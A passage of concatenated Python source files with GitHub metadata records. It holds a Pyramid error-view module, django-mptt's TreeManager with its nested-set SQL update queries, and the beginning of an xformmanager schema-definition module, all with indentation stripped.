The built-in ``excview`` tween will catch the exception, then call this
view. Without this view, the exception would propagate up to uWSGI,
which would then return an unhelpful 502 response.
``context`` is the exception.
"""
return error_view(HTTPInternalServerError(str(context)), request)
def includeme(config):
settings = config.registry.settings
config.add_view(
view=error_view,
context=HTTPClientError,
permission=NO_PERMISSION_REQUIRED)
config.add_forbidden_view(forbidden_view)
if not settings.get('debug'):
config.add_view(
view=exc_view,
context=Exception,
permission=NO_PERMISSION_REQUIRED)
| {
"content_hash": "27857982506e8f11247639269fb08aea",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 76,
"avg_line_length": 32.56923076923077,
"alnum_prop": 0.7085498346717053,
"repo_name": "storborg/sidecar",
"id": "5d8848edfddfe7a26eb15a1c1949583f8d810421",
"size": "2117",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sidecar/views/error.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3221"
},
{
"name": "JavaScript",
"bytes": "2881"
},
{
"name": "Python",
"bytes": "25342"
}
],
"symlink_target": ""
} |
"""
A custom manager for working with trees of objects.
"""
from django.db import connection, models, transaction
from django.db.models import F, Max
from django.utils.translation import ugettext as _
try:
from django.db import connections, router
except ImportError:
# multi db support was new in django 1.2
# NOTE we don't support django 1.1 anymore, so this stuff is likely to get removed soon
connections = None
router = None
from mptt.exceptions import InvalidMove
from mptt.utils import _exists
__all__ = ('TreeManager',)
qn = connection.ops.quote_name
COUNT_SUBQUERY = """(
SELECT COUNT(*)
FROM %(rel_table)s
WHERE %(mptt_fk)s = %(mptt_table)s.%(mptt_pk)s
)"""
CUMULATIVE_COUNT_SUBQUERY = """(
SELECT COUNT(*)
FROM %(rel_table)s
WHERE %(mptt_fk)s IN
(
SELECT m2.%(mptt_pk)s
FROM %(mptt_table)s m2
WHERE m2.%(tree_id)s = %(mptt_table)s.%(tree_id)s
AND m2.%(left)s BETWEEN %(mptt_table)s.%(left)s
AND %(mptt_table)s.%(right)s
)
)"""
class TreeManager(models.Manager):
"""
A manager for working with trees of objects.
"""
def init_from_model(self, model, prefix=None):
"""
Sets things up. This would normally be done in contribute_to_class(),
but Django calls that before we've created our extra tree fields on the
model (which we need). So it's done here instead, after field setup.
"""
self.prefix = prefix
# Avoid calling "get_field_by_name()", which populates the related
# model's cache and can cause circular imports in complex projects.
# Instead, find the tree_id field using "get_fields_with_model()".
[tree_field] = [fld for fld in model._meta.get_fields_with_model()
if fld[0].name == self.get_tree_id_attr()]
if tree_field[1]:
# tree_model is the model that contains the tree fields.
# this is usually just the same as model, but not for derived models.
self.tree_model = tree_field[1]
else:
self.tree_model = model
self._base_manager = None
if self.tree_model is not model:
# _base_manager is the treemanager on tree_model
if self.prefix is None:
tree_manager_name = '_tree_manager'
else:
tree_manager_name = '_%s_tree_manager' % self.prefix
self._base_manager = getattr(self.tree_model, tree_manager_name)
def get_parent_attr(self):
return self.model._mptt_meta.get_parent_attr(prefix=self.prefix)
@property
def parent_attr(self):
return self.get_parent_attr()
def get_left_attr(self):
return self.model._mptt_meta.get_left_attr(prefix=self.prefix)
@property
def left_attr(self):
return self.get_left_attr()
def get_right_attr(self):
return self.model._mptt_meta.get_right_attr(prefix=self.prefix)
@property
def right_attr(self):
return self.get_right_attr()
def get_tree_id_attr(self):
return self.model._mptt_meta.get_tree_id_attr(prefix=self.prefix)
@property
def tree_id_attr(self):
return self.get_tree_id_attr()
def get_level_attr(self):
return self.model._mptt_meta.get_level_attr(prefix=self.prefix)
@property
def level_attr(self):
return self.get_level_attr()
def _translate_lookups(self, **lookups):
new_lookups = {}
for k, v in lookups.items():
parts = k.split('__')
new_parts = []
for part in parts:
new_parts.append(getattr(self, '%s_attr' % part, part))
new_lookups['__'.join(new_parts)] = v
return new_lookups
def _mptt_filter(self, qs=None, **filters):
"""
Like self.filter(), but translates name-agnostic filters for MPTT fields.
"""
if self._base_manager:
return self._base_manager._mptt_filter(qs=qs, **filters)
if qs is None:
qs = self.get_query_set()
return qs.filter(**self._translate_lookups(**filters))
def _mptt_update(self, qs=None, **items):
"""
Like self.update(), but translates name-agnostic MPTT fields.
"""
if self._base_manager:
return self._base_manager._mptt_update(qs=qs, **items)
if qs is None:
qs = self.get_query_set()
return qs.update(**self._translate_lookups(**items))
def _get_connection(self, node):
if connections is None:
return connection
else:
return connections[router.db_for_write(node)]
def add_related_count(self, queryset, rel_model, rel_field, count_attr,
cumulative=False):
"""
Adds a related item count to a given ``QuerySet`` using its
``extra`` method, for a ``Model`` class which has a relation to
this ``Manager``'s ``Model`` class.
Arguments:
``rel_model``
A ``Model`` class which has a relation to this `Manager``'s
``Model`` class.
``rel_field``
The name of the field in ``rel_model`` which holds the
relation.
``count_attr``
The name of an attribute which should be added to each item in
this ``QuerySet``, containing a count of how many instances
of ``rel_model`` are related to it through ``rel_field``.
``cumulative``
If ``True``, the count will be for each item and all of its
descendants, otherwise it will be for each item itself.
"""
meta = self.model._meta
if cumulative:
subquery = CUMULATIVE_COUNT_SUBQUERY % {
'rel_table': qn(rel_model._meta.db_table),
'mptt_fk': qn(rel_model._meta.get_field(rel_field).column),
'mptt_table': qn(self.tree_model._meta.db_table),
'mptt_pk': qn(meta.pk.column),
'tree_id': qn(meta.get_field(self.get_tree_id_attr(
)).column),
'left': qn(meta.get_field(self.get_left_attr(
)).column),
'right': qn(meta.get_field(self.get_right_attr(
)).column),
}
else:
subquery = COUNT_SUBQUERY % {
'rel_table': qn(rel_model._meta.db_table),
'mptt_fk': qn(rel_model._meta.get_field(rel_field).column),
'mptt_table': qn(self.tree_model._meta.db_table),
'mptt_pk': qn(meta.pk.column),
}
return queryset.extra(select={count_attr: subquery})
def get_query_set(self):
"""
Returns a ``QuerySet`` which contains all tree items, ordered in
such a way that that root nodes appear in tree id order and
their subtrees appear in depth-first order.
"""
return super(TreeManager, self).get_query_set().order_by(
self.get_tree_id_attr(),
self.get_left_attr())
def insert_node(self, node, target, position='last-child', save=False,
allow_existing_pk=False):
"""
Sets up the tree state for ``node`` (which has not yet been
inserted into in the database) so it will be positioned relative
to a given ``target`` node as specified by ``position`` (when
appropriate) it is inserted, with any neccessary space already
having been made for it.
A ``target`` of ``None`` indicates that ``node`` should be
the last root node.
If ``save`` is ``True``, ``node``'s ``save()`` method will be
called before it is returned.
NOTE: This is a low-level method; it does NOT respect ``MPTTMeta.order_insertion_by``.
In most cases you should just set the node's parent and let mptt call this during save.
"""
if self._base_manager:
return self._base_manager.insert_node(node, target, position=position, save=save)
if node.pk and not allow_existing_pk and _exists(self.filter(pk=node.pk)):
raise ValueError(_('Cannot insert a node which has already been saved.'))
if target is None:
setattr(node, self.get_left_attr(), 1)
setattr(node, self.get_right_attr(), 2)
setattr(node, self.get_level_attr(), 0)
setattr(node, self.get_tree_id_attr(), self._get_next_tree_id())
setattr(node, self.get_parent_attr(), None)
elif target.is_root_node() and position in ['left', 'right']:
target_tree_id = getattr(target, self.get_tree_id_attr())
if position == 'left':
tree_id = target_tree_id
space_target = target_tree_id - 1
else:
tree_id = target_tree_id + 1
space_target = target_tree_id
self._create_tree_space(space_target, )
setattr(node, self.get_left_attr(), 1)
setattr(node, self.get_right_attr(), 2)
setattr(node, self.get_level_attr(), 0)
setattr(node, self.get_tree_id_attr(), tree_id)
setattr(node, self.get_parent_attr(), None)
else:
setattr(node, self.get_left_attr(), 0)
setattr(node, self.get_level_attr(), 0)
space_target, level, left, parent, right_shift = \
self._calculate_inter_tree_move_values(node, target, position,
)
tree_id = getattr(parent, self.get_tree_id_attr())
self._create_space(2, space_target, tree_id)
setattr(node, self.get_left_attr(), -left)
setattr(node, self.get_right_attr(), -left + 1)
setattr(node, self.get_level_attr(), -level)
setattr(node, self.get_tree_id_attr(), tree_id)
setattr(node, self.get_parent_attr(), parent)
if parent:
self._post_insert_update_cached_parent_right(parent, right_shift,
)
if save:
node.save()
return node
def move_node(self, node, target, position='last-child'):
"""
Moves ``node`` relative to a given ``target`` node as specified
by ``position`` (when appropriate), by examining both nodes and
calling the appropriate method to perform the move.
A ``target`` of ``None`` indicates that ``node`` should be
turned into a root node.
Valid values for ``position`` are ``'first-child'``,
``'last-child'``, ``'left'`` or ``'right'``.
``node`` will be modified to reflect its new tree state in the
database.
This method explicitly checks for ``node`` being made a sibling
of a root node, as this is a special case due to our use of tree
ids to order root nodes.
NOTE: This is a low-level method; it does NOT respect ``MPTTMeta.order_insertion_by``.
In most cases you should just move the node yourself by setting node.parent.
"""
if self._base_manager:
return self._base_manager.move_node(node, target,
position=position, )
if target is None:
if node.is_child_node():
self._make_child_root_node(node, )
elif target.is_root_node() and position in ['left', 'right']:
self._make_sibling_of_root_node(node, target, position,)
else:
if node.is_root_node():
self._move_root_node(node, target, position)
else:
self._move_child_node(node, target, position)
transaction.commit_unless_managed()
def root_node(self, tree_id):
"""
Returns the root node of the tree with the given id.
"""
if self._base_manager:
return self._base_manager.root_node(tree_id)
return self._mptt_filter(tree_id=tree_id, parent__isnull=True).get()
def root_nodes(self):
"""
Creates a ``QuerySet`` containing root nodes.
"""
if self._base_manager:
return self._base_manager.root_nodes()
return self._mptt_filter(parent__isnull=True)
def rebuild(self):
"""
Rebuilds whole tree in database using `parent` link.
"""
if self._base_manager:
return self._base_manager.rebuild()
opts = self.model._mptt_meta
qs = self._mptt_filter(parent__isnull=True)
if opts.order_insertion_by:
qs = qs.order_by(*opts.order_insertion_by)
pks = qs.values_list('pk', flat=True)
idx = 0
for pk in pks:
idx += 1
self._rebuild_helper(pk, 1, idx)
def _post_insert_update_cached_parent_right(self, instance, right_shift):
setattr(instance, self.get_right_attr(),
getattr(instance, self.get_right_attr()) + right_shift)
attr = '_%s_cache' % self.get_parent_attr()
if hasattr(instance, attr):
parent = getattr(instance, attr)
if parent:
self._post_insert_update_cached_parent_right(parent, right_shift,
)
def _rebuild_helper(self, pk, left, tree_id, level=0):
opts = self.model._mptt_meta
right = left + 1
qs = self._mptt_filter(parent__pk=pk)
if opts.order_insertion_by:
qs = qs.order_by(*opts.order_insertion_by)
child_ids = qs.values_list('pk', flat=True)
for child_id in child_ids:
right = self._rebuild_helper(child_id, right, tree_id, level + 1)
qs = self.model._default_manager.filter(pk=pk)
self._mptt_update(qs,
left=left,
right=right,
level=level,
tree_id=tree_id
)
return right + 1
def _calculate_inter_tree_move_values(self, node, target, position):
"""
Calculates values required when moving ``node`` relative to
``target`` as specified by ``position``.
"""
left = getattr(node, self.get_left_attr())
level = getattr(node, self.get_level_attr())
target_left = getattr(target, self.get_left_attr())
target_right = getattr(target, self.get_right_attr())
target_level = getattr(target, self.get_level_attr())
if position == 'last-child' or position == 'first-child':
if position == 'last-child':
space_target = target_right - 1
else:
space_target = target_left
level_change = level - target_level - 1
parent = target
elif position == 'left' or position == 'right':
if position == 'left':
space_target = target_left - 1
else:
space_target = target_right
level_change = level - target_level
parent = getattr(target, self.get_parent_attr())
else:
raise ValueError(_('An invalid position was given: %s.') % position)
left_right_change = left - space_target - 1
right_shift = 0
if parent:
right_shift = 2 * (node.get_descendant_count() + 1)
return space_target, level_change, left_right_change, parent, right_shift
def _close_gap(self, size, target, tree_id):
"""
Closes a gap of a certain ``size`` after the given ``target``
point in the tree identified by ``tree_id``.
"""
self._manage_space(-size, target, tree_id, )
def _create_space(self, size, target, tree_id):
"""
Creates a space of a certain ``size`` after the given ``target``
point in the tree identified by ``tree_id``.
"""
self._manage_space(size, target, tree_id, )
def _create_tree_space(self, target_tree_id):
"""
Creates space for a new tree by incrementing all tree ids
greater than ``target_tree_id``.
"""
qs = self._mptt_filter(tree_id__gt=target_tree_id)
self._mptt_update(qs, tree_id=F(self.get_tree_id_attr()) + 1)
def _get_next_tree_id(self):
"""
Determines the next largest unused tree id for the tree managed
by this manager.
"""
qs = self.get_query_set()
max_tree_id = qs.aggregate(Max(self.get_tree_id_attr())).values()[0]
max_tree_id = max_tree_id or 0
return max_tree_id + 1
def _inter_tree_move_and_close_gap(self, node, level_change,
left_right_change, new_tree_id,
parent_pk=None):
"""
Removes ``node`` from its current tree, with the given set of
changes being applied to ``node`` and its descendants, closing
the gap left by moving ``node`` as it does so.
If ``parent_pk`` is ``None``, this indicates that ``node`` is
being moved to a brand new tree as its root node, and will thus
have its parent field set to ``NULL``. Otherwise, ``node`` will
have ``parent_pk`` set for its parent field.
"""
opts = self.model._meta
inter_tree_move_query = """
UPDATE %(table)s
SET %(level)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(level)s - %%s
ELSE %(level)s END,
%(tree_id)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %%s
ELSE %(tree_id)s END,
%(left)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(left)s - %%s
WHEN %(left)s > %%s
THEN %(left)s - %%s
ELSE %(left)s END,
%(right)s = CASE
WHEN %(right)s >= %%s AND %(right)s <= %%s
THEN %(right)s - %%s
WHEN %(right)s > %%s
THEN %(right)s - %%s
ELSE %(right)s END,
%(parent)s = CASE
WHEN %(pk)s = %%s
THEN %(new_parent)s
ELSE %(parent)s END
WHERE %(tree_id)s = %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'level': qn(opts.get_field(self.get_level_attr()).column),
'left': qn(opts.get_field(self.get_left_attr()).column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'parent': qn(opts.get_field(self.get_parent_attr()).column),
'pk': qn(opts.pk.column),
'new_parent': parent_pk is None and 'NULL' or '%s',
}
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
gap_size = right - left + 1
gap_target_left = left - 1
params = [
left, right, level_change,
left, right, new_tree_id,
left, right, left_right_change,
gap_target_left, gap_size,
left, right, left_right_change,
gap_target_left, gap_size,
node.pk,
getattr(node, self.get_tree_id_attr())
]
if parent_pk is not None:
params.insert(-1, parent_pk)
cursor = self._get_connection(node).cursor()
cursor.execute(inter_tree_move_query, params)
def _make_child_root_node(self, node, new_tree_id=None):
"""
Removes ``node`` from its tree, making it the root node of a new
tree.
If ``new_tree_id`` is not specified a new tree id will be
generated.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
if not new_tree_id:
new_tree_id = self._get_next_tree_id()
left_right_change = left - 1
self._inter_tree_move_and_close_gap(node, level, left_right_change,
new_tree_id, )
# Update the node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), left - left_right_change)
setattr(node, self.get_right_attr(), right - left_right_change)
setattr(node, self.get_level_attr(), 0)
setattr(node, self.get_tree_id_attr(), new_tree_id)
setattr(node, self.get_parent_attr(), None)
node._mptt_cached_fields[self.get_parent_attr()] = None
def _make_sibling_of_root_node(self, node, target, position):
"""
Moves ``node``, making it a sibling of the given ``target`` root
node as specified by ``position``.
``node`` will be modified to reflect its new tree state in the
database.
Since we use tree ids to reduce the number of rows affected by
tree mangement during insertion and deletion, root nodes are not
true siblings; thus, making an item a sibling of a root node is
a special case which involves shuffling tree ids around.
"""
if node == target:
raise InvalidMove(_('A node may not be made a sibling of itself.'))
opts = self.model._meta
tree_id = getattr(node, self.get_tree_id_attr())
target_tree_id = getattr(target, self.get_tree_id_attr())
if node.is_child_node():
if position == 'left':
space_target = target_tree_id - 1
new_tree_id = target_tree_id
elif position == 'right':
space_target = target_tree_id
new_tree_id = target_tree_id + 1
else:
raise ValueError(_('An invalid position was given: %s.') % position)
self._create_tree_space(space_target, )
if tree_id > space_target:
# The node's tree id has been incremented in the
# database - this change must be reflected in the node
# object for the method call below to operate on the
# correct tree.
setattr(node, self.get_tree_id_attr(), tree_id + 1)
self._make_child_root_node(node, new_tree_id, )
else:
if position == 'left':
if target_tree_id > tree_id:
left_sibling = target.get_previous_sibling()
if node == left_sibling:
return
new_tree_id = getattr(left_sibling, self.get_tree_id_attr())
lower_bound, upper_bound = tree_id, new_tree_id
shift = -1
else:
new_tree_id = target_tree_id
lower_bound, upper_bound = new_tree_id, tree_id
shift = 1
elif position == 'right':
if target_tree_id > tree_id:
new_tree_id = target_tree_id
lower_bound, upper_bound = tree_id, target_tree_id
shift = -1
else:
right_sibling = target.get_next_sibling()
if node == right_sibling:
return
new_tree_id = getattr(right_sibling, self.get_tree_id_attr())
lower_bound, upper_bound = new_tree_id, tree_id
shift = 1
else:
raise ValueError(_('An invalid position was given: %s.') % position)
root_sibling_query = """
UPDATE %(table)s
SET %(tree_id)s = CASE
WHEN %(tree_id)s = %%s
THEN %%s
ELSE %(tree_id)s + %%s END
WHERE %(tree_id)s >= %%s AND %(tree_id)s <= %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
}
cursor = self._get_connection(node).cursor()
cursor.execute(root_sibling_query, [tree_id, new_tree_id, shift,
lower_bound, upper_bound])
setattr(node, self.get_tree_id_attr(), new_tree_id)
def _manage_space(self, size, target, tree_id):
"""
Manages spaces in the tree identified by ``tree_id`` by changing
the values of the left and right columns by ``size`` after the
given ``target`` point.
"""
opts = self.model._meta
space_query = """
UPDATE %(table)s
SET %(left)s = CASE
WHEN %(left)s > %%s
THEN %(left)s + %%s
ELSE %(left)s END,
%(right)s = CASE
WHEN %(right)s > %%s
THEN %(right)s + %%s
ELSE %(right)s END
WHERE %(tree_id)s = %%s
AND (%(left)s > %%s OR %(right)s > %%s)""" % {
'table': qn(self.tree_model._meta.db_table),
'left': qn(opts.get_field(self.get_left_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
}
cursor = self._get_connection(self.model).cursor()
cursor.execute(space_query, [target, size, target, size, tree_id,
target, target])
def _move_child_node(self, node, target, position):
"""
Calls the appropriate method to move child node ``node``
relative to the given ``target`` node as specified by
``position``.
"""
tree_id = getattr(node, self.get_tree_id_attr())
target_tree_id = getattr(target, self.get_tree_id_attr())
if tree_id == target_tree_id:
self._move_child_within_tree(node, target, position)
else:
self._move_child_to_new_tree(node, target, position)
def _move_child_to_new_tree(self, node, target, position):
"""
Moves child node ``node`` to a different tree, inserting it
relative to the given ``target`` node in the new tree as
specified by ``position``.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
new_tree_id = getattr(target, self.get_tree_id_attr())
space_target, level_change, left_right_change, parent, new_parent_right = \
self._calculate_inter_tree_move_values(node, target, position,)
tree_width = right - left + 1
# Make space for the subtree which will be moved
self._create_space(tree_width, space_target, new_tree_id)
# Move the subtree
self._inter_tree_move_and_close_gap(node, level_change,
left_right_change, new_tree_id, parent.pk, )
# Update the node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), left - left_right_change)
setattr(node, self.get_right_attr(), right - left_right_change)
setattr(node, self.get_level_attr(), level - level_change)
setattr(node, self.get_tree_id_attr(), new_tree_id)
setattr(node, self.get_parent_attr(), parent)
node._mptt_cached_fields[self.get_parent_attr()] = parent.pk
def _move_child_within_tree(self, node, target, position):
"""
Moves child node ``node`` within its current tree relative to
the given ``target`` node as specified by ``position``.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
width = right - left + 1
tree_id = getattr(node, self.get_tree_id_attr())
target_left = getattr(target, self.get_left_attr())
target_right = getattr(target, self.get_right_attr())
target_level = getattr(target, self.get_level_attr())
if position == 'last-child' or position == 'first-child':
if node == target:
raise InvalidMove(_('A node may not be made a child of itself.'))
elif left < target_left < right:
raise InvalidMove(_('A node may not be made a child of any of its descendants.'))
if position == 'last-child':
if target_right > right:
new_left = target_right - width
new_right = target_right - 1
else:
new_left = target_right
new_right = target_right + width - 1
else:
if target_left > left:
new_left = target_left - width + 1
new_right = target_left
else:
new_left = target_left + 1
new_right = target_left + width
level_change = level - target_level - 1
parent = target
elif position == 'left' or position == 'right':
if node == target:
raise InvalidMove(_('A node may not be made a sibling of itself.'))
elif left < target_left < right:
raise InvalidMove(_('A node may not be made a sibling of any of its descendants.'))
if position == 'left':
if target_left > left:
new_left = target_left - width
new_right = target_left - 1
else:
new_left = target_left
new_right = target_left + width - 1
else:
if target_right > right:
new_left = target_right - width + 1
new_right = target_right
else:
new_left = target_right + 1
new_right = target_right + width
level_change = level - target_level
parent = getattr(target, self.get_parent_attr())
else:
raise ValueError(_('An invalid position was given: %s.') % position)
left_boundary = min(left, new_left)
right_boundary = max(right, new_right)
left_right_change = new_left - left
gap_size = width
if left_right_change > 0:
gap_size = -gap_size
opts = self.model._meta
# The level update must come before the left update to keep
# MySQL happy - left seems to refer to the updated value
# immediately after its update has been specified in the query
# with MySQL, but not with SQLite or Postgres.
move_subtree_query = """
UPDATE %(table)s
SET %(level)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(level)s - %%s
ELSE %(level)s END,
%(left)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(left)s + %%s
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(left)s + %%s
ELSE %(left)s END,
%(right)s = CASE
WHEN %(right)s >= %%s AND %(right)s <= %%s
THEN %(right)s + %%s
WHEN %(right)s >= %%s AND %(right)s <= %%s
THEN %(right)s + %%s
ELSE %(right)s END,
%(parent)s = CASE
WHEN %(pk)s = %%s
THEN %%s
ELSE %(parent)s END
WHERE %(tree_id)s = %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'level': qn(opts.get_field(self.get_level_attr()).column),
'left': qn(opts.get_field(self.get_left_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'parent': qn(opts.get_field(self.get_parent_attr()).column),
'pk': qn(opts.pk.column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
}
cursor = self._get_connection(node).cursor()
cursor.execute(move_subtree_query, [
left, right, level_change,
left, right, left_right_change,
left_boundary, right_boundary, gap_size,
left, right, left_right_change,
left_boundary, right_boundary, gap_size,
node.pk, parent.pk,
tree_id])
# Update the node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), new_left)
setattr(node, self.get_right_attr(), new_right)
setattr(node, self.get_level_attr(), level - level_change)
setattr(node, self.get_parent_attr(), parent)
node._mptt_cached_fields[self.get_parent_attr()] = parent.pk
def _move_root_node(self, node, target, position):
"""
Moves root node``node`` to a different tree, inserting it
relative to the given ``target`` node as specified by
``position``.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
tree_id = getattr(node, self.get_tree_id_attr())
new_tree_id = getattr(target, self.get_tree_id_attr())
width = right - left + 1
if node == target:
raise InvalidMove(_('A node may not be made a child of itself.'))
elif tree_id == new_tree_id:
raise InvalidMove(_('A node may not be made a child of any of its descendants.'))
space_target, level_change, left_right_change, parent, right_shift = \
self._calculate_inter_tree_move_values(node, target, position,)
# Create space for the tree which will be inserted
self._create_space(width, space_target, new_tree_id)
# Move the root node, making it a child node
opts = self.model._meta
move_tree_query = """
UPDATE %(table)s
SET %(level)s = %(level)s - %%s,
%(left)s = %(left)s - %%s,
%(right)s = %(right)s - %%s,
%(tree_id)s = %%s,
%(parent)s = CASE
WHEN %(pk)s = %%s
THEN %%s
ELSE %(parent)s END
WHERE %(left)s >= %%s AND %(left)s <= %%s
AND %(tree_id)s = %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'level': qn(opts.get_field(self.get_level_attr()).column),
'left': qn(opts.get_field(self.get_left_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
'parent': qn(opts.get_field(self.get_parent_attr()).column),
'pk': qn(opts.pk.column),
}
cursor = self._get_connection(node).cursor()
cursor.execute(move_tree_query, [level_change, left_right_change,
left_right_change, new_tree_id, node.pk, parent.pk, left, right,
tree_id])
# Update the former root node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), left - left_right_change)
setattr(node, self.get_right_attr(), right - left_right_change)
setattr(node, self.get_level_attr(), level - level_change)
setattr(node, self.get_tree_id_attr(), new_tree_id)
setattr(node, self.get_parent_attr(), parent)
node._mptt_cached_fields[self.get_parent_attr()] = parent.pk
| {
"content_hash": "5f49ea4d91c1811709fe241fa83717b4",
"timestamp": "",
"source": "github",
"line_count": 907,
"max_line_length": 99,
"avg_line_length": 39.50826901874311,
"alnum_prop": 0.5429201317184796,
"repo_name": "danielnaab/django-mptt",
"id": "848dad0e3fc5eb4fb50a761038d281979b867d3c",
"size": "35834",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mptt/managers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "140622"
},
{
"name": "Shell",
"bytes": "115"
}
],
"symlink_target": ""
} |
from xformmanager.util import *
# unfortunately, have to do something like this because of semi-circular dependencies
import xformmanager as xfm
from lxml import etree
import logging
XPATH_SEPARATOR = "/"
class ElementDef(object):
""" Stores metadata about simple and complex types """
def __init__(self, name='', is_repeatable=False, domain=None):
self.name = name
self.xpath = ''
if domain and not self.getattr("domain", None):
self.domain=domain
self.child_elements = []
self.type = ''
self.is_repeatable = is_repeatable
#self.attributes - not supported yet
# this var is a device for getting diffs between defs
self._visited = False
def __unicode__(self):
return unicode(self.xpath)
def __str__(self):
return unicode(self).encode('utf-8')
@property
def short_name(self):
""" This is the unqualified tag of the element
(without qualifying namespace or xpath) """
c = unicode(self.xpath).rsplit(XPATH_SEPARATOR, 1)
if len(c)==2:
return c[1]
return c[0]
def to_str(self, depth=0, string=''):
""" Dumps the entire contents of this to a string """
indent = ' '*depth
string = indent + "xpath=" + str(self.xpath) + "\n"
string = string + indent + \
"name=" + str(self.name) + \
", type=" + str(self.type) + \
", repeatable=" + str(self.is_repeatable) + "\n"
for child in self.child_elements:
string = string + child.to_str(depth+1, string)
return string
def isValid(self):
# TODO: place restriction functions in here
pass
def addChild(self, element_def):
self.child_elements.append(element_def)
def populateElementFields(self, input_node, xpath, full_name):
if not self.name: self.name = full_name
self.type = input_node.get('type')
if xpath:
self.xpath = xpath + XPATH_SEPARATOR + input_node.get('name')
else:
self.xpath = input_node.get('name')
def find_child(self, child):
""" Looks for child among child_elements of self.
Equivalence is currently based on short_name. """
for candidate in self.child_elements:
if candidate.short_name == child.short_name:
return candidate
return None
def _clear_visited(self):
""" _visited is a device for getting diffs between defs """
for child in self.child_elements:
child._visited = False
child._clear_visited()
def _get_unvisited(self, root=None):
""" _visited is a device for getting diffs between defs """
d = []
if root is None:
# hm, I guess you can't pass 'self' as a default argument...
root = self
for child in root.child_elements:
if not child._visited:
d.append( child )
d = d + self._get_unvisited(child)
return d
def _get_elementdef_diff(self, otherdef):
""" Determines whether two elementdef leaves are equivalent
(but does not check for children equivalency) We can always
extend this later to provide richer diff information """
d = Differences()
if self.name != otherdef.name or \
self.xpath != otherdef.xpath or \
self.type != otherdef.type or \
self.is_repeatable != otherdef.is_repeatable:
d.fields_changed.append( otherdef )
otherdef._visited = True
return d
def _get_children_diff(self, otherdef):
d = Differences()
for child in self.child_elements:
# find matching child in otherdef
# assumption: the schemas provided are well-formed
# and do not contain duplicate children
otherchild = otherdef.find_child( child )
if not otherchild:
d.fields_removed.append(child)
else:
d = d + child._get_elementdef_diff(otherchild)
d = d + child._get_children_diff(otherchild)
return d
class FormDef(ElementDef):
"""Stores metadata about forms"""
# When this code was written, I didn't realize XML requires having
# only one root element. Ergo, the root of this xml is accessed via
# FormDef.root (rather than just FormDef)
def __init__(self, input_stream=None, child_element=None, domain=None,
**kwargs):
"""Either a stream pointer to an XML stream to populate this form
or a child element to a valid element_def should be provided.
If neither is, this is a pretty useless form"""
# call the base class to initialize some more properties
super(FormDef, self).__init__(**kwargs)
# set some high level concepts
self.types = {}
self.version = None
self.uiversion = None
self.target_namespace = ''
if input_stream is not None and child_element is not None:
# log this, cause it's a bad idea
logging.error("""Both XML and a child element explicitly passed to
create a new formdef. The child element %s will be
ignored""" % child_element)
if input_stream is not None:
# populate all of the child elements
payload = get_xml_string(input_stream)
self.populateFromXmlString(payload)
elif child_element is not None:
self.child_elements = [child_element]
if len(self.child_elements)>1:
# fail hard on too many children, since it's bad xml
raise Exception("Poorly formed XML. Multiple root elements!")
if not self.child_elements:
logging.info("You just created a formdef %s with no children. Why?!" % self)
#logging.error("You just created a formdef %s with no children. Why?!" % self)
else:
# safe to set a root node here
self.root = self.child_elements[0]
self.domain = domain
def __unicode__(self):
return unicode(self.target_namespace)
def __str__(self):
return unicode(self).encode('utf-8')
@classmethod
def from_file(cls, file, valid=True):
""" By default, schemas read off of the file system are forced to be valid
(for now, this just means that poorly formatted versions are forced to None)
"""
fin = open(file, 'r')
formdef = FormDef(fin)
if valid:
formdef.force_to_valid()
fin.close()
return formdef
def to_str(self):
""" Dumps the entire contents of this to a string """
string = "\nDEFINITION OF " + str(self.name) + "\n"
string = string + "TYPES: \n"
for t in self.types:
string = string + self.types[t].name + "\n"
for allowable_value in self.types[t].allowable_values:
string = string + " allowable_value: " + allowable_value + "\n"
for multiselect_value in self.types[t].multiselect_values:
string = string + " multiselect_value: " + multiselect_value + "\n"
string = string + "ELEMENTS: \n"
return string + ElementDef.to_str(self)
def populateFromXmlString(self, string):
""" Populates formdef with data from xml string
Note that we currently allow 'bad form' xforms
(e.g. bad metadata, bad version numbers)
Such errors can be caught/reported using FormDef.validate()
"""
root = etree.XML(string)
self.version = case_insensitive_attribute(root, "version")
self.uiversion = case_insensitive_attribute(root, "uiversion")
